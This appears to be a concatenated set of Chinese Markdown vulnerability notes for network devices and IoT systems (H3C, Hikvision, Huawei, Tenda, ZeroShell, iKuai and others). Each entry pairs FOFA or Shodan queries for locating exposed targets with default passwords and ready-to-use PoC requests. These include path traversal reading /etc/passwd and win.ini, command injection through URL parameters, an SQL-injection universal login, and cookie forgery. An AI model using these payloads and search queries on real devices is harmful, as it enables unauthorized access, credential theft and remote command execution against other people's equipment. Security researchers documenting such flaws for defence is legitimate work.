-------------------------------------------------------------------------------- /网络设备漏洞/H3C SecPath下一代防火墙 任意文件下载漏洞.md: -------------------------------------------------------------------------------- 1 | # H3C SecPath下一代防火墙 任意文件下载漏洞 2 | 3 | ## 漏洞描述 4 | 5 | H3C SecPath 下一代防火墙 存在功能点导致任意文件下载漏洞,攻击者通过漏洞可以获取敏感信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | H3C SecPath 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | title="Web user login" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面如下 22 | 23 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202110914717.png) 24 | 25 | 存在漏洞点的功能有两个 26 | 27 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202110914728.png) 28 | 29 | 点击下载抓包更改请求 30 | 31 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202110914422.png) 32 | 33 | 并且在未身份验证的情况中,也可以请求下载敏感文件 34 | 35 | 验证POC 36 | 37 | ```plain 38 | /webui/?g=sys_dia_data_check&file_name=../../etc/passwd 39 | 40 | /webui/? 41 | g=sys_capture_file_download&name=../../../../../../../../etc/passwd 42 | ``` -------------------------------------------------------------------------------- /网络设备漏洞/HIKVISION 流媒体管理服务器 user.xml 账号密码泄漏漏洞.md: -------------------------------------------------------------------------------- 1 | # HIKVISION 流媒体管理服务器 user.xml 账号密码泄漏漏洞 2 | 3 | ## 漏洞描述 4 | 5 | HIKVISION 流媒体管理服务器配置文件未做鉴权,攻击者通过漏洞可以获取网站账号密码 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | HIKVISION 流媒体管理服务器 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | "杭州海康威视系统技术有限公司 版权所有" && title="流媒体管理服务器" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登陆页面 22 | 23 | ![image-20220519172629739](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191726829.png) 24 | 25 | POC 26 | 27 | ``` 28 | /config/user.xml 29 | ``` 30 | 31 | ![image-20220519172714407](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191727443.png) 32 | 33 | ``` 34 | 35 | ``` 36 | 37 | base64解密 38 | 39 | ``` 40 | 41 | ``` 42 | 43 | -------------------------------------------------------------------------------- /网络设备漏洞/HIKVISION 流媒体管理服务器 后台任意文件读取漏洞 CNVD-2021-14544.md: -------------------------------------------------------------------------------- 1 | # HIKVISION 流媒体管理服务器 后台任意文件读取漏洞 CNVD-2021-14544 2 | 3 | ## 漏洞描述 4 | 5 | 杭州海康威视系统技术有限公司流媒体管理服务器存在弱口令漏洞,攻击者可利用该漏洞登录后台通过文件遍历漏洞获取敏感信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | HIKVISION 流媒体管理服务器 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | "杭州海康威视系统技术有限公司 版权所有" && title="流媒体管理服务器" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面如下, 默认账号密码为 `admin/12345` 22 | 23 | ![image-20220519172955875](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191729966.png) 24 | 25 | 访问如下URL下载`C:/windows/system.ini`文件 26 | 27 | ``` 28 | http://xxx.xxx.xxx.xxx/systemLog/downFile.php?fileName=../../../../../../../../../../../../../../../windows/system.ini 29 | ``` 30 | 31 | -------------------------------------------------------------------------------- /网络设备漏洞/HIKVISION 视频编码设备接入网关 $DATA 任意文件读取.md: -------------------------------------------------------------------------------- 1 | # HIKVISION 视频编码设备接入网关 $DATA 任意文件读取 2 | 3 | ## 漏洞描述 4 | 5 | HIKVISION 视频编码设备接入网关存在配置错误特性,特殊后缀请求php文件可读取源码 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | HIKVISION 视频编码设备接入网关 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | title="视频编码设备接入网关" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登陆页面 22 | 23 | ![image-20220519174129368](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191741462.png) 24 | 25 | POC 26 | 27 | ``` 28 | /data/login.php::$DATA 29 | ``` 30 | 31 | ![image-20220519174235421](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191742487.png) -------------------------------------------------------------------------------- /网络设备漏洞/HIKVISION 视频编码设备接入网关 showFile.php 任意文件下载漏洞.md: -------------------------------------------------------------------------------- 1 | # HIKVISION 视频编码设备接入网关 showFile.php 任意文件下载漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 海康威视视频接入网关系统在页面`/serverLog/showFile.php`的参数fileName存在任意文件下载漏洞 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | HIKVISION 视频编码设备接入网关 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | title="视频编码设备接入网关" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![image-20220519174129368](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191743965.png) 24 | 25 | 漏洞文件为 `showFile.php`, 其中 `参数 fileName` 没有过滤危险字符,导致可文件遍历下载 26 | 27 | ``` 28 | '.$line.''; 35 | } 36 | fclose($fp); 37 | ?> 38 | ``` 39 | 40 | POC 41 | 42 | ``` 43 | /serverLog/showFile.php?fileName=../web/html/main.php 44 | ``` 45 | 46 | ![image-20220519174337483](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191743535.png) -------------------------------------------------------------------------------- /网络设备漏洞/Huawei DG8045 deviceinfo 信息泄漏漏洞.md: -------------------------------------------------------------------------------- 1 | # Huawei DG8045 deviceinfo 信息泄漏漏洞 2 | 3 | ## 漏洞描述 4 | 5 | Huawei DG8045 deviceinfo api接口存在信息泄漏漏洞,攻击者通过泄漏的信息可以获得账号密码登录后台 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | Huawei DG8045 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="DG8045-Home-Gateway-DG8045" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![image-20220519181753641](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191817718.png) 24 | 25 | 验证POC 26 | 27 | ``` 28 | /api/system/deviceinfo 29 | ``` 30 | 31 | ![image-20220519181803482](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191818539.png) 32 | 33 | SerialNumber 后8位即为初始密码 -------------------------------------------------------------------------------- /网络设备漏洞/Huawei HG659 lib 任意文件读取漏洞.md: -------------------------------------------------------------------------------- 1 | # Huawei HG659 lib 任意文件读取漏洞 2 | 3 | ## 漏洞描述 4 | 5 | Huawei HG659 lib 存在任意文件读取漏洞,攻击者通过漏洞可以读取任意文件 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | Huawei HG659 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="HUAWEI-Home-Gateway-HG659" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面如下 22 | 23 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202110951141.png) 24 | 25 | POC如下 26 | 27 | ```plain 28 | /lib///....//....//....//....//....//....//....//....//etc//passwd 29 | ``` 30 | 31 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202110951927.png) -------------------------------------------------------------------------------- /网络设备漏洞/Intelbras Wireless 未授权与密码泄露 CVE-2021-3017.md: -------------------------------------------------------------------------------- 1 | # Intelbras Wireless 未授权与密码泄露 CVE-2021-3017 2 | 3 | ## 漏洞描述 4 | 5 | Intelbras IWR 3000N是波兰Intelbras公司的一款无线路由器。 Intelbras WIN 300 and WRN 342 devices 2021-01-04版本及之前版本存在安全漏洞,该漏洞允许远程攻击者通过读取HTML源代码中的def wireless spassword行来发现凭据。 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | win_300_firmware 等 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | body="def_wirelesspassword" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面如下 22 | 23 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162247460.png) 24 | 25 | 查看网页源代码,泄露了配置密码 26 | 27 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162247389.png) 28 | 29 | 测试了一下其他的,发现出现账号密码的原因为访问的是路由的配置页面,配置后获取后台权限 30 | 31 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162247069.png) -------------------------------------------------------------------------------- /网络设备漏洞/JCG JHR-N835R 后台命令执行漏洞.md: -------------------------------------------------------------------------------- 1 | # JCG JHR-N835R 后台命令执行漏洞 2 | 3 | ## 漏洞描述 4 | 5 | JCG JHR-N835R 后台存在命令执行,通过 ; 分割 ping 命令导致任意命令执行 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | JCG JHR-N835R 11 | ``` 12 | 13 | ## Shodan 14 | 15 | ``` 16 | JHR-N835R 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 admin admin登录 22 | 23 | ![image-20220209202626135](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202092026189.png) 24 | 25 | 在后台系统工具那使用 PING工具,使用 ; 命令执行绕过 26 | 27 | ![image-20220209202640541](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202092026647.png) 28 | 29 | ![image-20220209202702580](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202092027634.png) -------------------------------------------------------------------------------- /网络设备漏洞/KEDACOM数字系统接入网关 任意文件读取漏洞.md: -------------------------------------------------------------------------------- 1 | # KEDACOM数字系统接入网关 任意文件读取漏洞 2 | 3 | ## 漏洞描述 4 | 5 | KEDACOM 数字系统接入网关 存在任意文件读取漏洞,攻击者通过构造请求可以读取服务器任意文件 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | KEDACOM 数字系统接入网关 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | (app="KEDACOM-DVR接入网关") && (is_honeypot=false && is_fraud=false) 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面如下 22 | 23 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162300072.png) 24 | 25 | 使用POC读取 /etc/hosts 26 | 27 | ```plain 28 | /gatewayweb/FileDownloadServlet?fileName=test.txt&filePath=../../../../../../../../../../Windows/System32/drivers/etc/hosts%00.jpg&type=2 29 | ``` 30 | 31 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162300019.png) -------------------------------------------------------------------------------- /网络设备漏洞/KONE 通力电梯管理系统 app_show_log_lines.php 任意文件读取漏洞.md: -------------------------------------------------------------------------------- 1 | # KONE 通力电梯管理系统 app_show_log_lines.php 任意文件读取漏洞 2 | 3 | ## 漏洞描述 4 | 5 | KONE 通力电梯 app_show_log_lines.php文件过滤不足导致任意文件读取漏洞 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | KONE 通力电梯管理系统 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | "KONE Configuration management" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 主页面 22 | 23 | ![image-20220519184439370](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191844461.png) 24 | 25 | 发送POST请求包 26 | 27 | ``` 28 | fileselection=/etc/passwd 29 | ``` 30 | 31 | ![image-20220519184600379](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191846469.png) -------------------------------------------------------------------------------- /网络设备漏洞/Kyan 网络监控设备 hosts 账号密码泄露漏洞.md: -------------------------------------------------------------------------------- 1 | # Kyan 网络监控设备 hosts 账号密码泄露漏洞 2 | 3 | ## 漏洞描述 4 | 5 | Kyan 网络监控设备 存在账号密码泄露漏洞,攻击者通过漏洞可以获得账号密码和后台权限 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | Kyan 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | title="platform - Login" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面如下 22 | 23 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202140926162.png) 24 | 25 | POC 26 | 27 | ```plain 28 | http://xxx.xxx.xxx.xxx/hosts 29 | ``` 30 | 31 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202140927595.png) 32 | 33 | 成功获得账号密码 34 | 35 | 36 | 37 | -------------------------------------------------------------------------------- /网络设备漏洞/MSA 互联网管理网关 msa 任意文件下载漏洞.md: -------------------------------------------------------------------------------- 1 | # MSA 互联网管理网关 msa 任意文件下载漏洞 2 | 3 | ## 漏洞描述 4 | 5 | MSA 互联网管理网关存在任意文件读取漏洞,攻击者通过漏洞可以读取服务器任意文件 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | MSA 互联网管理网关 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | "互联网管理网关" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202110916716.png) 24 | 25 | 验证POC 26 | 27 | ```php 28 | /msa/../../../../etc/passwd 29 | ``` 30 | 31 | ![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202110916705.png) -------------------------------------------------------------------------------- /网络设备漏洞/MagicFlow 防火墙网关 main.xp 任意文件读取漏洞.md: -------------------------------------------------------------------------------- 1 | # MagicFlow 防火墙网关 main.xp 任意文件读取漏洞 2 | 3 | ## 漏洞描述 4 | 5 | MagicFlow 防火墙网关 main.xp 存在任意文件读取漏洞,攻击者通过构造特定的Url获取敏感文件 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | MagicFlow 防火墙网关 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="MSA/1.0" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面如下 22 | 23 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162301720.png) 24 | 25 | 构造POC 26 | 27 | ```plain 28 | /msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../etc/passwd 29 | ``` 30 | 31 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162301323.png) -------------------------------------------------------------------------------- /网络设备漏洞/NetMizer 日志管理系统 cmd.php 远程命令执行漏洞.md: -------------------------------------------------------------------------------- 1 | # NetMizer 日志管理系统 cmd.php 远程命令执行漏洞 2 | 3 | ## 漏洞描述 4 | 5 | NetMizer 日志管理系统 cmd.php中存在远程命令执行漏洞,攻击者通过传入 cmd参数即可命令执行 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | NetMizer 日志管理系统 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | title="NetMizer 日志管理系统" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![image-20220519175506872](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191755197.png) 24 | 25 | 验证POC 26 | 27 | ``` 28 | /data/manage/cmd.php?cmd=id 29 | ``` 30 | 31 | ![image-20220519175604237](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191756275.png) -------------------------------------------------------------------------------- /网络设备漏洞/NetMizer 日志管理系统 data 目录遍历漏洞.md: -------------------------------------------------------------------------------- 1 | # NetMizer 日志管理系统 data 目录遍历漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 北京灵州网络技术有限公司NetMizer日志管理系统存在目录遍历漏洞,由于 /data 控制不严格,攻击者可利用该漏洞获取敏感信息。 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | NetMizer 日志管理系统 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | title="NetMizer 日志管理系统" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![image-20220519175506872](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191757812.png) 24 | 25 | 验证POC 26 | 27 | ``` 28 | /data 29 | ``` 30 | 31 | ![image-20220519175728991](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191757072.png) -------------------------------------------------------------------------------- /网络设备漏洞/NetMizer 日志管理系统 登录绕过漏洞.md: -------------------------------------------------------------------------------- 1 | # NetMizer 日志管理系统 登录绕过漏洞 2 | 3 | ## 漏洞描述 4 | 5 | NetMizer 日志管理系统存在登录绕过漏洞,通过限制某个请求包的发送获取后台权限 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | NetMizer 日志管理系统 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | title="NetMizer 日志管理系统" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162257795.png) 24 | 25 | 访问页面 main.html 并抓取请求包, 使用Burp Drop掉下面对请求包 26 | 27 | ![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162257627.png) 28 | 29 | Drop后停止抓包,成功进入后台 30 | 31 | ![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162257550.png) -------------------------------------------------------------------------------- /网络设备漏洞/Sapido 多款路由器 远程命令执行漏洞.md: -------------------------------------------------------------------------------- 1 | # Sapido 多款路由器 远程命令执行漏洞 2 | 3 | ## 漏洞描述 4 | 5 | Sapido多款路由器在未授权的情况下,导致任意访问者可以以Root权限执行命令 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | BR270n-v2.1.03 11 | BRC76n-v2.1.03 12 | GR297-v2.1.3 13 | RB1732-v2.0.43 14 | ``` 15 | 16 | ## FOFA 17 | 18 | ``` 19 | app="Sapido-路由器" 20 | ``` 21 | 22 | ## 漏洞复现 23 | 24 | 固件中存在一个asp文件为 **syscmd.asp** 存在命令执行 25 | 26 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162237726.png) 27 | 28 | 访问目标: 29 | 30 | ```plain 31 | http://xxx.xxx.xxx.xxx/syscmd.asp 32 | http://xxx.xxx.xxx.xxx/syscmd.htm 33 | ``` 34 | 35 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162237444.png) 36 | 37 | 直接输入就可以命令执行了 38 | 39 | -------------------------------------------------------------------------------- /网络设备漏洞/TVT数码科技 NVMS-1000 路径遍历漏洞.md: -------------------------------------------------------------------------------- 1 | # TVT数码科技 NVMS-1000 路径遍历漏洞 2 | 3 | ## 漏洞描述 4 | 5 | TVT数码科技 TVT NVMS-1000是中国TVT数码科技公司的一套网络监控视频管理系统。 TVT数码科技 TVT NVMS-1000中存在路径遍历漏洞。远程攻击者可通过发送包含/../的特制URL请求利用该漏洞查看系统上的任意文件 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | TVT NVMS-1000 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="TVT-NVMS-1000" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面如下 22 | 23 | 24 | 25 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162301376.png)发送请求包读取文件 26 | 27 | ```plain 28 | GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1 29 | Host: 30 | Cache-Control: max-age=0 31 | Upgrade-Insecure-Requests: 1 32 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 33 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 34 | Accept-Encoding: gzip, deflate 35 | Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6 36 | Connection: close 37 | ``` 38 | 39 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162302589.png) -------------------------------------------------------------------------------- /网络设备漏洞/Tenda 11N无线路由器 Cookie 越权访问漏洞.md: -------------------------------------------------------------------------------- 1 | # Tenda 11N无线路由器 Cookie 越权访问漏洞 2 | 3 | ## 漏洞描述 4 | 5 | Tenda 11N无线路由器由于只验证Cookie,导致任意用户伪造Cookie即可进入后台 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | Tenda 11N无线路由器 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="TENDA-11N无线路由器" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![image-20220519180949727](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191809768.png) 24 | 25 | 添加Cookie, 访问 index.asp 进入后台 26 | 27 | ``` 28 | admin:language=cn 29 | ``` 30 | 31 | ![image-20220519181248549](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191812628.png) -------------------------------------------------------------------------------- /网络设备漏洞/Tenda W15E企业级路由器 RouterCfm.cfg 配置文件泄漏漏洞.md: -------------------------------------------------------------------------------- 1 | # Tenda W15E企业级路由器 RouterCfm.cfg 配置文件泄漏漏洞 2 | 3 | ## 漏洞描述 4 | 5 | Tenda 企业级路由器 RouterCfm.cfg 配置文件可在未授权的情况下被读取,导致账号密码等敏感信息泄漏 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | Tenda 企业级路由器 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | title=="Tenda | Login" && country="CN" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![image-20220519181331832](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191813876.png) 24 | 25 | 访问路径![image-20220519181508329](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191815422.png) 26 | 27 | 后台账号密码位于参数 `sys.userpass` base64解密后的字符 28 | 29 | ![image-20220519181456848](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191814923.png) -------------------------------------------------------------------------------- /网络设备漏洞/Wayos AC集中管理系统默认弱口令 CNVD-2021-00876.md: -------------------------------------------------------------------------------- 1 | # Wayos AC集中管理系统默认弱口令 CNVD-2021-00876 2 | 3 | ## 漏洞描述 4 | 5 | 深圳维盟科技股份有限公司是国内领先的网络设备及智能家居产品解决方案供应商,主营产品包括无线网关、交换机、国外VPN、双频吸顶ap等。 6 | 7 | AC集中管理平台存在弱口令漏洞,攻击者可利用该漏洞获取敏感信息。 8 | 9 | ## 漏洞影响 10 | 11 | ``` 12 | AC集中管理系统 13 | ``` 14 | 15 | ## FOFA 16 | 17 | ``` 18 | title="AC集中管理系统" 19 | ``` 20 | 21 | ## 漏洞复现 22 | 23 | 默认弱口令为 admin:admin 24 | 25 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162240238.png) 26 | 27 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162240645.png) 28 | -------------------------------------------------------------------------------- /网络设备漏洞/Wayos 防火墙 后台命令执行漏洞.md: -------------------------------------------------------------------------------- 1 | # Wayos 防火墙 后台命令执行漏洞 2 | 3 | ## 漏洞描述 4 | 5 | Wayos 防火墙 后台存在命令执行漏洞,通过命令注入可以执行远程命令 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | Wayos 防火墙 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | body="Get_Verify_Info(hex_md5(user_string)." 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面如下 22 | 23 | 24 | 25 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162240644.png) 26 | 27 | 登录后台后 ping 模块命令执行 28 | 29 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162240143.png) -------------------------------------------------------------------------------- /网络设备漏洞/Wayos 防火墙 账号密码泄露漏洞.md: -------------------------------------------------------------------------------- 1 | # Wayos 防火墙 账号密码泄露漏洞 2 | 3 | ## 漏洞描述 4 | 5 | Wayos 防火墙存在账号密码泄露漏洞,攻击者通过前端可以查看到密码的md5的加密字符,解密后可以登陆后台 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | Wayos 防火墙 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | body="Get_Verify_Info(hex_md5(user_string)." 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面如下 22 | 23 | F12 查看账号密码 24 | 25 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162239392.png) 26 | 27 | 解密Md5即可登录后台 28 | 29 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162239676.png) -------------------------------------------------------------------------------- /网络设备漏洞/XAMPP phpinfo.php 信息泄漏漏洞.md: -------------------------------------------------------------------------------- 1 | # XAMPP phpinfo.php 信息泄漏漏洞 2 | 3 | ## 漏洞描述 4 | 5 | XAMPP存在信息泄露漏洞,/dashboard/phpinfo.php 访问权限控制不严格,攻击者可获取系统敏感信息。 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | XAMPP 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | "Welcome to XAMPP" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162238289.png) 24 | 25 | 访问页面 **/dashboard/phpinfo.php** 26 | 27 | ![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162238311.png) -------------------------------------------------------------------------------- /网络设备漏洞/ZeroShell 3.9.0 远程命令执行漏洞 CVE-2019-12725.md: -------------------------------------------------------------------------------- 1 | # ZeroShell 3.9.0 远程命令执行漏洞 CVE-2019-12725 2 | 3 | ## 漏洞描述 4 | 5 | ZeroShell 3.9.0 存在命令执行漏洞,/cgi-bin/kerbynet 页面,x509type 参数过滤不严格,导致攻击者可执行任意命令 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | ZeroShell < 3.9.0 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="Zeroshell-防火墙" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面如下 22 | 23 | 24 | 25 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162258497.png) 26 | 27 | 验证的POC为 28 | 29 | ```plain 30 | /cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0Aid%0A%27 31 | ``` 32 | 33 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162258777.png) -------------------------------------------------------------------------------- /网络设备漏洞/iKuai 流控路由 SQL注入漏洞.md: -------------------------------------------------------------------------------- 1 | # iKuai 流控路由 SQL注入漏洞 2 | 3 | ## 漏洞描述 4 | 5 | iKuai 流控路由 存在SQL注入漏洞,可以通过SQL注入漏洞构造万能密码获取路由器后台管理权限 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | iKuai 流控路由 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | title="登录爱快流控路由" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面如下 22 | 23 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202140931704.png) 24 | 25 | 使用万能密码登录后台 26 | 27 | ```plain 28 | user: "or""=""or""=" 29 | pass: 空 30 | ``` 31 | 32 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202140931830.png) -------------------------------------------------------------------------------- /网络设备漏洞/中国移动 禹路由 ExportSettings.sh 敏感信息泄露漏洞 CNVD-2020-67110.md: -------------------------------------------------------------------------------- 1 | # 中国移动 禹路由 ExportSettings.sh 敏感信息泄露漏洞 CNVD-2020-67110 2 | 3 | ## 漏洞描述 4 | 5 | 中国移动 禹路由 ExportSettings.sh 存在敏感信息泄露漏洞,攻击者通过漏洞获取配置文件,其中包含账号密码等敏感信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 中国移动 禹路由 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | title="互联世界 物联未来-登录" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面如下 22 | 23 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162254794.png) 24 | 25 | 访问Url 26 | 27 | ```plain 28 | /cgi-bin/ExportSettings.sh 29 | ``` 30 | 31 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162254659.png) 32 | 33 | 其中password为登录后台密码 -------------------------------------------------------------------------------- /网络设备漏洞/中国移动 禹路由 simple-index.asp 越权访问漏洞 CNVD-2020-55983.md: -------------------------------------------------------------------------------- 1 | # 中国移动 禹路由 simple-index.asp 越权访问漏洞 CNVD-2020-55983 2 | 3 | ## 漏洞描述 4 | 5 | 中国移动 禹路由 simple-index.asp 存在越权访问漏洞,攻击者通过漏洞可以获取账号密码等敏感信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 中国移动 禹路由 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | title="互联世界 物联未来-登录" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面如下 22 | 23 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162253135.png) 24 | 25 | 26 | 27 | 访问Url 28 | 29 | ```plain 30 | /simple-index.asp 31 | ``` 32 | 33 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162253346.png) 34 | 35 | 越过管理员验证获取Wifl账号密码等信息 -------------------------------------------------------------------------------- /网络设备漏洞/中科网威 下一代防火墙控制系统 download.php 任意文件读取漏洞.md: 